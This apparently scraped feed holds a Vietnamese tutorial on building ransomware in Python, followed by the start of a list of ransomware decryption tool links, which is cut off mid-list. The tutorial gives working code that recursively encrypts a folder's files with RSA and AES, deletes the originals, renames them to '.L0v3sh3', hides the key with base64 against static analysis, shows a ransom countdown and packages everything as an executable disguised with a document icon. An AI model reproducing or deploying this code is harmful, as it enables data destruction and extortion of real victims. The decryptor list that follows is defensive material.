<p>Ransomware giống như phần mềm độc hại hoặc virus máy tính, nhưng với một mục đích là mã hóa dữ liệu và đòi tiền chuộc cho bạn. Dữ liệu của bạn được mã hóa bằng <a href="https://butchiso.com/2016/01/ma-hoa-bat-doi-xung-rsa.html" target="_blank" rel="noopener">mã hóa bất đối xứng</a> và virus chỉ mã hóa bằng khóa công khai. Có một khóa riêng để giải mã dữ liệu của bạn trở lại, nhưng kẻ tấn công chắc chắn sẽ không đính kèm khóa riêng với virus.</p>
<h2>Các bước chuẩn bị để tạo ransomware</h2>
<p>Trước khi bạn xây dựng một số chương trình, bạn phải hiểu nó sẽ làm gì. Đây là danh sách các yêu cầu của mình, bạn cũng có thể sử dụng danh sách của riêng mình.</p>
<p>1. Chương trình phải là một tệp thực thi và có icon giống như một tệp tài liệu.</p>
<p>2. Chương trình phải mã hóa dữ liệu bằng khóa công khai</p>
<p>3. Sau khi mã hóa, chương trình phải xóa các tệp gốc và thay đổi phần mở rộng tệp được mã hóa thành “.L0v3sh3”.</p>
<p>4. Chương trình phải hiển thị thông báo có đồng hồ đếm ngược.</p>
<h2>Viết chương trình Ransomware</h2>
<h3>Bước 1 &#8211; Tạo khóa cá nhân và khóa công khai</h3>
<p>Đoạn code dưới đây dùng để tạo khóa cá nhân (privateKey) và khóa công khai (publicKey). Khá dễ hiểu nên mình sẽ không giải thích thêm.</p>
<pre class="EnlighterJSRAW" data-enlighter-language="generic">'''
pip install pycryptodome
'''

from Crypto.PublicKey import RSA

key = RSA.generate(2048)
privateKey = key.export_key()
publicKey = key.publickey().export_key()

# lưu khóa cá nhân vào tệp
with open('private.pem', 'wb') as f:
    f.write(privateKey)

# lưu khóa công khai vào tệp
with open('public.pem', 'wb') as f:
    f.write(publicKey)

print('Private key saved to private.pem')
print('Public key saved to public.pem')
print('Done')</pre>
<p><img decoding="async" class="size-full  aligncenter" src="https://anonyviet.com/wp-content/uploads/2022/04/1__DDa6RiGiMeuTQMoy3yekQ.png" alt="Cách tạo Ransomware bằng Python 13" width="450" height="23" title="Cách tạo Ransomware bằng Python 19"></p>
<p>Sau khi chạy file genKey.py, bạn sẽ có 2 tệp là private.pem và public.pem. Các bạn nhớ lưu file private.pem một cách an toàn.</p>
<h3>Bước 2 &#8211; Mã hóa khóa công khai</h3>
<p>Mục đích chính của việc mã hóa là làm cho khóa công khai khó xác định bằng cách phân tích phần mềm độc hại dạng tĩnh. Vì vậy, mình mã hóa khóa công khai bằng base64 và đính kèm khóa đó vào code của mình.</p>
<p>Bạn có thể sử dụng đoạn lệnh này:</p>
<pre class="nk nl nm nn gz nw bt nx"><span id="63a2" class="gc kv kw ja ny b do nz oa l ob" data-selectable-paragraph="">import base64
</span><span id="c179" class="gc kv kw ja ny b do oc od oe of og oa l ob" data-selectable-paragraph="">code = "aGkgZnJpZW5kcywgdGhpcyBpcyBiYXNlNjQgZW5jb2Rpbmc=" 
print(base64.b64decode(code))</span></pre>
<p>Vì vậy, bạn có thể mã hóa khóa riêng tư của mình, sau đó giải mã nó trong script.</p>
<pre class="EnlighterJSRAW" data-enlighter-language="generic">import base64
with open('public.pem', 'rb') as f:
    public = f.read()
print(base64.b64encode(public))
</pre>
<h3>Bước 3 &#8211; Mã hóa một số tệp trong thư mục</h3>
<pre class="EnlighterJSRAW" data-enlighter-language="generic">def scanRecurse(baseDir):
    for entry in os.scandir(baseDir):
        if entry.is_file():
            yield entry
        else:
            yield from scanRecurse(entry.path)</pre>
<p>Hàm trên là một hàm đệ quy để quét các thư mục và trả lại một loạt các tệp được liệt kê cùng đường dẫn. Sau đó, mình sử dụng hàm mã hóa và cung cấp danh sách file đã lấy trước đó.</p>
<pre class="EnlighterJSRAW" data-enlighter-language="generic">import base64
import os
from Crypto.PublicKey import RSA
from Crypto.Cipher import PKCS1_OAEP, AES

'''
with open('public.pem', 'rb') as f:
    public = f.read()
print(base64.b64encode(public))
'''

# Mã hóa khóa công khai bằng base64
pubKey = '''LS0tLS1CRUdJTiBQVUJMSUMgS0VZLS0tLS0KTUlJQklqQU5CZ2txaGtpRzl3MEJBUUVGQUFPQ0FROEFNSUlCQ2dLQ0FRRUFxZUs0TkppUGlaQ1o0aDRwM2lzNwpyOTdTRGRnaWtrckswNE1sc3oraHY2UmIxKzB2M1hsY296QXVGeGIvMjkxTE5tNGs1M1RZTXQ4M3BPRm9ZRTh4Ckx0VE55UVNSMDR2dzBGcGRwU3Y1YVVjbysxRmtwRjRMdCtqV1Q0YjVrTUFqWTRkOW5Yb3lRQmxJbzBWckMwQzIKcldpeklONGV1TXBTbll3V2Z0a2JsZE5qcDJ1U0hFeWM1Z0FZR1ZKSWZ6TVRiaUxZd0k5aU9rNllnWEozbWJLdAp1dHo2WlRTdlplVzEwaUhrc2JXUXgvcUVjR0JLWFJUbkUvYTJkZVhvRThRaFZOTUV5Z0xVQmF3NERYaWRCbXBiCnFmSWtvZk5UWlQ3K2NyaENocVptYmFrSjA5bTdmT3k1TURud0oraU0wdlBheW1tdGduWnBrR0NQNlpDVDlkeHoKcHdJREFRQUIKLS0tLS1FTkQgUFVCTElDIEtFWS0tLS0t'''
pubKey = base64.b64decode(pubKey)


def scanRecurse(baseDir):
    '''
    Quét thư mục và trả về danh sách tất cả các tệp.
    '''
    for entry in os.scandir(baseDir):
        if entry.is_file():
            yield entry
        else:
            yield from scanRecurse(entry.path)


def encrypt(dataFile, publicKey):
    '''
    sử dụng chế độ EAX để cho phép phát hiện các sửa đổi trái phép
    '''
    # đọc dữ liệu từ tệp
    with open(dataFile, 'rb') as f:
        data = f.read()
    
    # chuyển đổi dữ liệu sang byte
    data = bytes(data)

    # tạo đối tượng khóa công khai
    key = RSA.import_key(publicKey)
    sessionKey = os.urandom(16)

    # mã hóa khóa phiên bằng khóa công khai
    cipher = PKCS1_OAEP.new(key)
    encryptedSessionKey = cipher.encrypt(sessionKey)

    # mã hóa dữ liệu bằng khóa phiên
    cipher = AES.new(sessionKey, AES.MODE_EAX)
    ciphertext, tag = cipher.encrypt_and_digest(data)

    # lưu dữ liệu được mã hóa vào tệp
    [ fileName, fileExtension ] = dataFile.split('.')
    encryptedFile = fileName + '_encrypted.' + fileExtension
    with open(encryptedFile, 'wb') as f:
        [ f.write(x) for x in (encryptedSessionKey, cipher.nonce, tag, ciphertext) ]
    print('Encrypted file saved to ' + encryptedFile)

fileName = 'test.txt'
encrypt(fileName, pubKey)</pre>
<p>Và đối với hàm giải mã, bạn có thể sử dụng lệnh dưới đây.</p>
<pre class="EnlighterJSRAW" data-enlighter-language="generic">def decrypt(dataFile, privateKeyFile):
    '''
    sử dụng chế độ EAX để cho phép phát hiện các sửa đổi trái phép
    '''

    # đọc khóa cá nhân từ tệp
    with open(privateKeyFile, 'rb') as f:
        privateKey = f.read()
        # create private key object
        key = RSA.import_key(privateKey)

    # đọc dữ liệu từ tệp
    with open(dataFile, 'rb') as f:
        # read the session key
        encryptedSessionKey, nonce, tag, ciphertext = [ f.read(x) for x in (key.size_in_bytes(), 16, 16, -1) ]

    # giải mã khóa phiên
    cipher = PKCS1_OAEP.new(key)
    sessionKey = cipher.decrypt(encryptedSessionKey)

    # giải mã dữ liệu bằng khóa phiên
    cipher = AES.new(sessionKey, AES.MODE_EAX, nonce)
    data = cipher.decrypt_and_verify(ciphertext, tag)

    # lưu dữ liệu đã giải mã vào tệp
    [ fileName, fileExtension ] = dataFile.split('.')
    decryptedFile = fileName + '_decrypted.' + fileExtension
    with open(decryptedFile, 'wb') as f:
        f.write(data)

    print('Decrypted file saved to ' + decryptedFile)</pre>
<p>Quét tệp, mã hóa tệp đó rồi thay đổi phần mở rộng.</p>
<pre class="EnlighterJSRAW" data-enlighter-language="generic">import base64
import os
from pathlib import Path
from Crypto.PublicKey import RSA
from Crypto.Cipher import PKCS1_OAEP, AES


# mã hóa khóa công khai bằng base64
pubKey = '''LS0tLS1CRUdJTiBQVUJMSUMgS0VZLS0tLS0KTUlJQklqQU5CZ2txaGtpRzl3MEJBUUVGQUFPQ0FROEFNSUlCQ2dLQ0FRRUFxZUs0TkppUGlaQ1o0aDRwM2lzNwpyOTdTRGRnaWtrckswNE1sc3oraHY2UmIxKzB2M1hsY296QXVGeGIvMjkxTE5tNGs1M1RZTXQ4M3BPRm9ZRTh4Ckx0VE55UVNSMDR2dzBGcGRwU3Y1YVVjbysxRmtwRjRMdCtqV1Q0YjVrTUFqWTRkOW5Yb3lRQmxJbzBWckMwQzIKcldpeklONGV1TXBTbll3V2Z0a2JsZE5qcDJ1U0hFeWM1Z0FZR1ZKSWZ6TVRiaUxZd0k5aU9rNllnWEozbWJLdAp1dHo2WlRTdlplVzEwaUhrc2JXUXgvcUVjR0JLWFJUbkUvYTJkZVhvRThRaFZOTUV5Z0xVQmF3NERYaWRCbXBiCnFmSWtvZk5UWlQ3K2NyaENocVptYmFrSjA5bTdmT3k1TURud0oraU0wdlBheW1tdGduWnBrR0NQNlpDVDlkeHoKcHdJREFRQUIKLS0tLS1FTkQgUFVCTElDIEtFWS0tLS0t'''
pubKey = base64.b64decode(pubKey)


def scanRecurse(baseDir):
    '''
    Quét một thư mục và trả về danh sách tất cả các tệp
    '''
    for entry in os.scandir(baseDir):
        if entry.is_file():
            yield entry
        else:
            yield from scanRecurse(entry.path)


def encrypt(dataFile, publicKey):
    '''
    Đầu vào: đường dẫn đến tệp để mã hóa, khóa công khai
    Đầu ra: tệp được mã hóa với phần mở rộng .L0v3sh3 và xóa tệp gốc
    sử dụng chế độ EAX để cho phép phát hiện các sửa đổi trái phép
    '''
    # đọc dữ liệu từ tệp
    extension = dataFile.suffix.lower()
    dataFile = str(dataFile)
    with open(dataFile, 'rb') as f:
        data = f.read()
    
    # chuyển đổi dữ liệu sang byte
    data = bytes(data)

    # tạo đối tượng khóa công khai
    key = RSA.import_key(publicKey)
    sessionKey = os.urandom(16)

    # mã hóa khóa phiên bằng khóa công khai
    cipher = PKCS1_OAEP.new(key)
    encryptedSessionKey = cipher.encrypt(sessionKey)

    # mã hóa dữ liệu bằng khóa phiên
    cipher = AES.new(sessionKey, AES.MODE_EAX)
    ciphertext, tag = cipher.encrypt_and_digest(data)

    # lưu dữ liệu được mã hóa vào tệp
    fileName= dataFile.split(extension)[0]
    fileExtension = '.L0v3sh3'
    encryptedFile = fileName + fileExtension
    with open(encryptedFile, 'wb') as f:
        [ f.write(x) for x in (encryptedSessionKey, cipher.nonce, tag, ciphertext) ]
    os.remove(dataFile)


# thay đổi thư mục thành thư mục của script
# giữ an toàn khi thay đổi thư mục,
# KHÔNG CHẠY SCRIPT NÀY TRÊN PC CỦA BẠN
directory = '../' # THAY ĐỔI CHỖ NÀY
excludeExtension = ['.py','.pem', '.exe'] # VỚI ĐỔI CHỖ NÀY
for item in scanRecurse(directory): 
    filePath = Path(item)
    fileType = filePath.suffix.lower()

    if fileType in excludeExtension:
        continue
    encrypt(filePath, pubKey)</pre>
<p>Để thử nghiệm, mình sẽ sử dụng thư mục gốc của thư mục chương trình này để quét và mã hóa bằng tập lệnh này.</p>
<p>Đây là thư mục của mình  trước khi chạy phần mềm độc hại:</p>
<figure id="attachment_41258" aria-describedby="caption-attachment-41258" style="width: 241px" class="wp-caption aligncenter"><img decoding="async" class=" size-full" src="https://anonyviet.com/wp-content/uploads/2022/04/1_oqdo3QC6fnOEBa5yitEmBw.png" alt="Cách tạo Ransomware bằng Python 14" width="241" height="152" title="Cách tạo Ransomware bằng Python 20"><figcaption id="caption-attachment-41258" class="wp-caption-text">thư mục của tôi trước khi chạy phần mềm độc hại</figcaption></figure>
<figure id="attachment_41256" aria-describedby="caption-attachment-41256" style="width: 451px" class="wp-caption aligncenter"><img decoding="async" class=" size-full" src="https://anonyviet.com/wp-content/uploads/2022/04/1_csKtPzH8Ey-2pSrLzkbrGg.png" alt="Cách tạo Ransomware bằng Python 15" width="451" height="68" title="Cách tạo Ransomware bằng Python 21"><figcaption id="caption-attachment-41256" class="wp-caption-text">nội dung của parent.txt</figcaption></figure>
<figure id="attachment_41257" aria-describedby="caption-attachment-41257" style="width: 419px" class="wp-caption aligncenter"><img decoding="async" class=" size-full" src="https://anonyviet.com/wp-content/uploads/2022/04/1_rlhvi7pJH0zfz6DvLvJ5ug.png" alt="Cách tạo Ransomware bằng Python 16" width="419" height="91" title="Cách tạo Ransomware bằng Python 22"><figcaption id="caption-attachment-41257" class="wp-caption-text">nội dung của testFile.txt</figcaption></figure>
<p>Đây là thư mục của mình sau khi chạy phần mềm độc hại:</p>
<p><img decoding="async" class="aligncenter  size-full" src="https://anonyviet.com/wp-content/uploads/2022/04/1_4AwB4_SihXXMERFguPaKsg.png" alt="Cách tạo Ransomware bằng Python 17" width="345" height="163" title="Cách tạo Ransomware bằng Python 23"></p>
<figure id="attachment_41254" aria-describedby="caption-attachment-41254" style="width: 989px" class="wp-caption aligncenter"><img decoding="async" class=" size-full" src="https://anonyviet.com/wp-content/uploads/2022/04/1_4wxKW6efBo2BE2C91iHa1Q.png" alt="Cách tạo Ransomware bằng Python 18" width="989" height="132" title="Cách tạo Ransomware bằng Python 24"><figcaption id="caption-attachment-41254" class="wp-caption-text">nội dung của parent.txt sau khi chạy chương trình</figcaption></figure>
<figure id="attachment_41259" aria-describedby="caption-attachment-41259" style="width: 986px" class="wp-caption aligncenter"><img decoding="async" class=" size-full" src="https://anonyviet.com/wp-content/uploads/2022/04/1_HYI6t69AKr2MtF2DzV_ASw.png" alt="Cách tạo Ransomware bằng Python 19" width="986" height="141" title="Cách tạo Ransomware bằng Python 25"><figcaption id="caption-attachment-41259" class="wp-caption-text">nội dung của testFile.txt sau khi chạy chương trình</figcaption></figure>
<div class="TnITTtw-original-wrap TnITTtw-padded-single-translation TnITTtw-t">
<div class="TnITTtw-mv-text-part TnITTtw-t">Chúng ta đã tạo xong một chương trình python để mã hóa tệp và thay đổi phần mở rộng tệp.</div>
<h3>Bước 4 &#8211; Đồng hồ đếm ngược và lời nhắn sau khi mã hóa xong</h3>
<p>Chỉ cần sao chép lệnh dưới và dán vào phần cuối của script.</p>
<pre class="EnlighterJSRAW" data-enlighter-language="generic">import tkinter as tk

def countdown(count):
    # thay đổi văn bản trong label
    # count = '01:30:00'
    hour, minute, second = count.split(':')
    hour = int(hour)
    minute = int(minute)
    second = int(second)

    label['text'] = '{}:{}:{}'.format(hour, minute, second)

    if second &gt; 0 or minute &gt; 0 or hour &gt; 0:
        # Gọi hàm countdown lại sau 1000ms (1s)
        if second &gt; 0:
            second -= 1
        elif minute &gt; 0:
            minute -= 1
            second = 59
        elif hour &gt; 0:
            hour -= 1
            minute = 59
            second = 59
        root.after(1000, countdown, '{}:{}:{}'.format(hour, minute, second)) 

root = tk.Tk()
root.title('L0v3sh3 Ransomware')
root.geometry('500x300')
root.resizable(False, False)
label1 = tk.Label(root, text='Your data is under rest, please don\'t pay me,\nthis just simulation !!\n\n', font=('calibri', 12,'bold'))
label1.pack()
label = tk.Label(root,font=('calibri', 50,'bold'), fg='white', bg='blue')
label.pack()

# Gọi hàm countdown lần đầu tiên    
countdown('01:30:00')
# root.after(0, countdown, 5)
root.mainloop()</pre>
<h3>Bước cuối cùng &#8211; Tạo tệp thực thi với auto-py-to-exe</h3>
<p>Bạn có thể tải toàn bộ script <a href="https://github.com/febimudiyanto/python-project/tree/main/simple-ransomware" target="_blank" rel="noopener">tại đây</a>, chỉ cần sao chép nó nhưng đừng quên hiểu những gì bạn đã viết.</p>
<h2>Khởi chạy Ransomware</h2>
<p><img decoding="async" class="size-full  aligncenter" src="https://anonyviet.com/wp-content/uploads/2022/04/1_aSHBiU2-8q4d-5i8E4_8fg.gif" alt="Cách tạo Ransomware bằng Python 20" width="951" height="582" title="Cách tạo Ransomware bằng Python 26"></p>
<h2>Kết luận</h2>
<p>Đây là một dự án nguy hiểm phải không? Hãy cẩn thận khi bạn chạy chương trình, đảm bảo rằng bạn thay đổi thư mục và thử nó trong máy ảo.</p>
<p>Bạn có thể sửa đổi ngược lại, giải mã các tệp .L0v3sh3. Chỉ cần thay đổi hàm mã hóa bằng giải mã.</p>
<p>Để phòng tránh, bạn nên bật chế độ xem tiện ích mở rộng của file để phân biệt được các tệp thực thi khác nhau.</p>
</div>
<h2>Câu hỏi thường gặp</h2>
<h3>Tôi có thể sử dụng mã này để mã hóa dữ liệu trên máy tính của người khác không?</h3>
<p>Không, bạn không nên sử dụng mã này để mã hóa dữ liệu trên máy tính của người khác.  Việc đó là bất hợp pháp và có thể dẫn đến hậu quả nghiêm trọng.</p>
<h3>Mã này sử dụng thuật toán mã hóa nào?</h3>
<p>Mã này sử dụng thuật toán mã hóa bất đối xứng RSA để mã hóa khóa phiên và thuật toán mã hóa đối xứng AES trong chế độ EAX để mã hóa dữ liệu.</p>
<h3>Tôi cần cài đặt thư viện nào để chạy mã này?</h3>
<p>Bạn cần cài đặt thư viện <code>pycryptodome</code> bằng lệnh <code>pip install pycryptodome</code>.</p>
]]></content:encoded>
					
					<wfw:commentRss>https://anonyviet.com/cach-tao-ransomware-bang-python/feed/</wfw:commentRss>
			<slash:comments>2</slash:comments>
		
		
			</item>
		<item>
		<title>Tổng hợp hơn 200 Tool giải mã Ransomware mới nhất</title>
		<link>https://anonyviet.com/tong-hop-hon-200-tool-giai-ma-ransomware/</link>
					<comments>https://anonyviet.com/tong-hop-hon-200-tool-giai-ma-ransomware/#comments</comments>
		
		<dc:creator><![CDATA[AnonyViet]]></dc:creator>
		<pubDate>Sat, 23 Apr 2022 06:33:04 +0000</pubDate>
				<category><![CDATA[Phần mềm máy tính]]></category>
		<category><![CDATA[giải mã Ransomware]]></category>
		<category><![CDATA[ransomware]]></category>
		<category><![CDATA[tool giải mã]]></category>
		<category><![CDATA[virus]]></category>
		<category><![CDATA[virus mã hóa]]></category>
		<guid isPermaLink="false">https://anonyviet.com/?p=41238</guid>

					<description><![CDATA[Ransomware hay còn gọi virus tống tiền, virus mã hóa là một trong những nổi ám ảnh của người sử dụng máy tính. Khi bị nhiễm Ransomware các tập tin đều sẽ bị mã hóa, và người dùng cần phải có Key giải mã hoặc Tool giải mã Ransomware mới có thể lấy lại được [&#8230;]]]></description>
										<content:encoded><![CDATA[<p><strong>Ransomware hay còn gọi virus tống tiền, virus mã hóa là một trong những nổi ám ảnh của người sử dụng máy tính. Khi bị nhiễm Ransomware các tập tin đều sẽ bị mã hóa, và người dùng cần phải có Key giải mã hoặc Tool giải mã Ransomware mới có thể lấy lại được dữ liệu. Khi lây nhiễm, Hacker thường để lại thông báo địa chỉ để người dùng trả tiền nhận lại Key giải mã.</strong></p>
<p>Tuy nhiên có một số Hacker hoàn lương hoặc đã kiếm đủ số tiền mong muốn hoặc một số nhóm Hacker bị đánh sập và Key giải mã được chia sẻ công khai để nạn nhân có thể khôi phục lại dữ liệu của mình. Dưới đây là tổng hợp danh sách các Tool giải mã Ransomware được cập nhật mới nhất vào tháng 4/2022.</p>
<p>Nếu máy tính bạn bị ransomware tấn công, hãy thử những công cụ dưới đây nhé. Mỗi loại Ransomware sẽ có công cụ giải mã khác nhau, chú ý tên đuôi file mã hóa để tải Tool giải mã cho đúng</p>
<p><a href="https://anonyviet.com/wp-content/uploads/2022/04/TOOL-GIAI-MA-RANSOMWARE-2-1.jpg"><img decoding="async" class="aligncenter size-full " src="https://anonyviet.com/wp-content/uploads/2022/04/TOOL-GIAI-MA-RANSOMWARE-2-1.jpg" alt="Tổng hợp Tool giải mã Ransomware" width="587" height="337" title="Tổng hợp hơn 200 Tool giải mã Ransomware mới nhất 28"></a></p>
<h2>Một số lưu ý khi bị ransomare tấn công</h2>
<p><strong>Bước 1:</strong> <strong> </strong>Không<strong> </strong>trả tiền chuộc vì không có gì đảm bảo Hacker sẽ cấp cho bạn quyền truy cập vào dữ liệu của bạn.</p>
<p><strong>Bước 2:</strong> Tìm bất kỳ bản sao lưu (backup) còn lại nào bạn có và nhớ lưu bản sao lưu dữ liệu ở các vị trí an toàn như USB, Cloud</p>
<p><strong>Bước 3:</strong> Nếu không có bản sao lưu nào, bạn phải thử giải mã dữ liệu bị khóa bởi ransomware bằng các Tool giải mã ransomware này.</p>
<h2>Tổng hợp Tool giải mã Ransomware</h2>
<ol>
<li><a href="https://decrypter.emsisoft.com/777" target="_blank" rel="noopener"><strong>.777 ransomware decrypting tool</strong></a></li>
<li><a href="https://github.com/hasherezade/malware_analysis/tree/master/7ev3n" target="_blank" rel="noopener"><strong>7even-HONE$T decrypting tool</strong></a></li>
<li><a href="https://download.bleepingcomputer.com/demonslay335/hidden-tear-bruteforcer.zip" target="_blank" rel="noopener"><strong>.8lock8 ransomware decrypting tool</strong></a>+ <a href="http://www.bleepingcomputer.com/forums/t/614025/8lock8-help-support-topic-8lock8-read-ittxt/" target="_blank" rel="noopener"><strong>explanations</strong></a></li>
<li><a href="https://github.com/hasherezade/malware_analysis/tree/master/7ev3n" target="_blank" rel="noopener"><strong>7ev3n decrypting tool</strong></a></li>
<li><a href="http://media.kaspersky.com/utilities/VirusUtilities/EN/rakhnidecryptor.zip" target="_blank" rel="noopener"><strong>AES_NI Rakhni decryptor tool</strong></a></li>
<li><strong><a href="https://media.kaspersky.com/utilities/VirusUtilities/EN/rakhnidecryptor.zip" target="_blank" rel="noopener">Agent.iih decrypting tool</a> </strong>(decrypted by the Rakhni Decryptor)</li>
<li><a href="https://files.avast.com/files/decryptor/avast_decryptor_alcatrazlocker.exe" target="_blank" rel="noopener"><strong>Alcatraz ransom decryptor tool</strong></a></li>
<li><a href="https://cta-service-cms2.hubspot.com/ctas/v2/public/cs/c/?cta_guid=d4173312-989b-4721-ad00-8308fff353b3&amp;placement_guid=22f2fe97-c748-4d6a-9e1e-ba3fb1060abe&amp;portal_id=326665&amp;redirect_url=APefjpGnqFjmP_xzeUZ1Y55ovglY1y1ch7CgMDLit5GTHcW9N0ztpnIE-ZReqqv8MDj687_4Joou7Cd2rSx8-De8uhFQAD_Len9QpT7Xvu8neW5drkdtTPV7hAaou0osAi2O61dizFXibewmpO60UUCd5OazCGz1V6yT_3UFMgL0x9S1VeOvoL_ucuER8g2H3f1EfbtYBw5QFWeUmrjk-9dGzOGspyn303k9XagBtF3SSX4YWSyuEs03Vq7Fxb04KkyKc4GJx-igK98Qta8iMafUam8ikg8XKPkob0FK6Pe-wRZ0QVWIIkM&amp;hsutk=34612af1cd87864cf7162095872571d1&amp;utm_referrer=https%3A%2F%2Finfo.phishlabs.com%2Fblog%2Falma-ransomware-analysis-of-a-new-ransomware-threat-and-a-decrypter&amp;canon=https%3A%2F%2Finfo.phishlabs.com%2Fblog%2Falma-ransomware-analysis-of-a-new-ransomware-threat-and-a-decrypter&amp;__hstc=61627571.34612af1cd87864cf7162095872571d1.1472135921345.1472140656779.1472593507113.3&amp;__hssc=61627571.1.1472593507113&amp;__hsfp=1114323283" target="_blank" rel="noopener"><strong>Alma ransomware decryption tool</strong></a></li>
<li><a href="https://decrypter.emsisoft.com/al-namrood" target="_blank" rel="noopener"><strong>Al-Namrood decrypting tool</strong></a></li>
<li><a href="https://www.bleepingcomputer.com/download/alphadecrypter/" target="_blank" rel="noopener"><strong>Alpha decrypting tool</strong></a></li>
<li><a href="https://www.bleepingcomputer.com/download/alphadecrypter/" target="_blank" rel="noopener"><strong>AlphaLocker decrypting tool</strong></a></li>
<li><a href="https://decrypter.emsisoft.com/download/amnesia" target="_blank" rel="noopener"><strong>Amnesia ransom decryptor tool</strong></a></li>
<li><a href="https://decrypter.emsisoft.com/download/amnesia2" target="_blank" rel="noopener"><strong>Amnesia ransom 2 decryptor tool</strong></a></li>
<li><a href="https://download.bitdefender.com/am/malware_removal/BDAnnabelleDecryptTool.exe" target="_blank" rel="noopener"><strong>Anabelle ransom decryptor tool</strong></a></li>
<li><a href="https://decrypter.emsisoft.com/apocalypse" target="_blank" rel="noopener"><strong>Apocalypse decrypting tool</strong></a></li>
<li><a href="https://decrypter.emsisoft.com/apocalypsevm" target="_blank" rel="noopener"><strong>ApocalypseVM decrypting tool</strong></a>+ <a href="http://www.avg.com/us-en/ransomware-decryption-tools#apocalypse" target="_blank" rel="noopener"><strong>alternative</strong></a></li>
<li><strong><a href="https://files.avast.com/files/decryptor/avast_decryptor_atomsilo.exe" target="_blank" rel="noopener">AtomSilo ransom decryptor tool</a></strong></li>
<li><strong><a href="http://media.kaspersky.com/utilities/VirusUtilities/EN/rakhnidecryptor.zip" target="_blank" rel="noopener">Aura decrypting tool</a> </strong>(decrypted by the Rakhni Decryptor)</li>
<li><strong><a href="https://www.bleepingcomputer.com/download/auroradecrypter/dl/379/" target="_blank" rel="noopener">Aurora ransom decryptor tool</a></strong> + <strong><a href="https://decrypter.emsisoft.com/download/aurora" target="_blank" rel="noopener">alternative</a></strong></li>
<li><strong><a href="https://media.kaspersky.com/utilities/VirusUtilities/EN/rannohdecryptor.zip" target="_blank" rel="noopener">AutoIt ransom decrypting tool</a> </strong>(decrypted by the Rannoh Decryptor) + <strong><a href="https://media.kaspersky.com/utilities/VirusUtilities/EN/rakhnidecryptor.zip" target="_blank" rel="noopener">alternative 1</a> </strong>(decrypted by Rakhni Decryptor)</li>
<li><a href="https://decrypter.emsisoft.com/autolocky" target="_blank" rel="noopener"><strong>Autolocky decrypting tool</strong></a></li>
<li><a href="https://download.bitdefender.com/am/malware_removal/BDAvaddonDecryptor.exe" target="_blank" rel="noopener"><strong>Avaddon ransom decryption tool</strong></a></li>
<li><a href="https://download.bitdefender.com/am/malware_removal/BDAvaddonDecryptor.exe" target="_blank" rel="noopener"><strong>Avest ransom decryption tool</strong></a></li>
<li><strong><a href="https://files.avast.com/files/decryptor/avast_decryptor_babuk.exe" target="_blank" rel="noopener">Babuk ransomware decryptor</a></strong></li>
<li><a href="https://decrypter.emsisoft.com/badblock" target="_blank" rel="noopener"><strong>Badblock decrypting tool</strong></a>+ <a href="http://www.avg.com/us-en/ransomware-decryption-tools#badblock%20+" target="_blank" rel="noopener"><strong>alternative 1</strong></a></li>
<li><a href="http://blog.checkpoint.com/wp-content/uploads/2017/03/BarRaxDecryptor.zip" target="_blank" rel="noopener"><strong>BarRax Ransom decryption tool</strong></a></li>
<li><a href="http://www.avg.com/us-en/ransomware-decryption-tools#bart" target="_blank" rel="noopener"><strong>Bart decrypting tool</strong></a></li>
<li><a href="https://files.avast.com/files/decryptor/avast_decryptor_bigbobross.exe" target="_blank" rel="noopener"><strong>BigBobRoss decrypting tool </strong></a></li>
<li><a href="https://media.kaspersky.com/utilities/VirusUtilities/EN/CoinVaultDecryptor.zip" target="_blank" rel="noopener"><strong>BitCryptor decrypting tool</strong></a></li>
<li><strong><a href="https://media.kaspersky.com/utilities/VirusUtilities/EN/RakhniDecryptor.zip" target="_blank" rel="noopener">Bitman ransomware versions 2 &amp; 3</a> </strong>(decrypted by the Rakhni Decryptor)</li>
<li><a href="https://download.bleepingcomputer.com/demonslay335/BitStakDecrypter.zip" target="_blank" rel="noopener"><strong>BitStak decrypting tool</strong></a></li>
<li><a href="https://files.avast.com/files/decryptor/avast_decryptor_btcware.exe" target="_blank" rel="noopener"><strong>BTCWare ransom decryptor</strong></a></li>
<li><strong><u><a href="https://powerbox-na-file.trend.org/SFDC/DownloadFile_iv.php?jsonInfo=%7b%22Query%22%3a%22jn1XVHnvtwlVGuZ9XTrPudWOVgKHfE1fVf4mh9XXETPsT4jEX1DzaXiIio6niXlTxEHkXvbf%2fag68Dmuv%2fz0adD%2f3a4rmG1FhFP7q1cJhqLLyvO8VuBr65fUerKjrrzMQWzRT86MuUneIx7%2b%2bi8LufENTYCTK1vakiJw0ij34qulyJRwqAHlBbxuMm5Zy%2b5BmueD%2bfAyd%2bJceSs3oSW6q3VL9gl11LWas2jPQvUCZM9D9UDepgprqnQtF%2fU7D7%2bon%2b3OSp8OdBwED8qp9RgXb53hqzal2kXNlyntYczTaOo%3d%22%2c%22iv%22%3a%22db0d918f007fe97830d4cbc2e44b4cd2%22%7d" target="_blank" rel="noopener">Cerber V1 ransomware decryption tool</a> + <a href="https://news.thewindowsclub.com/cerber-ransomware-decrypter-tool-85616/" target="_blank" rel="noopener">alternative</a></u></strong></li>
<li><a href="http://media.kaspersky.com/utilities/VirusUtilities/EN/rakhnidecryptor.zip" target="_blank" rel="noopener"><strong>Chimera decrypting tool</strong></a>+ <a href="https://www.nomoreransom.org/decryption-tools.html" target="_blank" rel="noopener"><strong>alternative 1</strong></a>+ <a href="https://success.trendmicro.com/portal_kb_articledetail?solutionid=1114221" target="_blank" rel="noopener"><strong>alternative 2</strong></a></li>
<li><a href="https://www.emsisoft.com/ransomware-decryption-tools/download/checkmail7" target="_blank" rel="noopener"><strong>CheckMail7 ransomware decryption tool</strong></a></li>
<li><a href="https://www.emsisoft.com/ransomware-decryption-tools/download/chernolocker" target="_blank" rel="noopener"><strong>ChernoLocker ransom decryption tool</strong></a></li>
<li><a href="https://www.nomoreransom.org/decryption-tools.html" target="_blank" rel="noopener"><strong>CoinVault ransom decrypting tool</strong></a></li>
<li><a href="https://decrypter.emsisoft.com/download/cry128" target="_blank" rel="noopener"><strong>Cry128 decrypting tool</strong></a></li>
<li><a href="https://decrypter.emsisoft.com/download/cry9" target="_blank" rel="noopener"><strong>Cry9 Ransom decrypting tool</strong></a></li>
<li><strong><a href="https://www.nomoreransom.org/decryption-tools.html" target="_blank" rel="noopener">Cryakl decrypting tool</a> </strong>(decrypted by the Rannoh Decryptor)</li>
<li><strong><a href="https://www.nomoreransom.org/decryption-tools.html" target="_blank" rel="noopener">Crybola decrypting tool</a> </strong>(decrypted by the Rannoh Decryptor)</li>
<li><a href="https://decrypter.emsisoft.com/crypboss" target="_blank" rel="noopener"><strong>CrypBoss ransomware decrypting tool</strong></a></li>
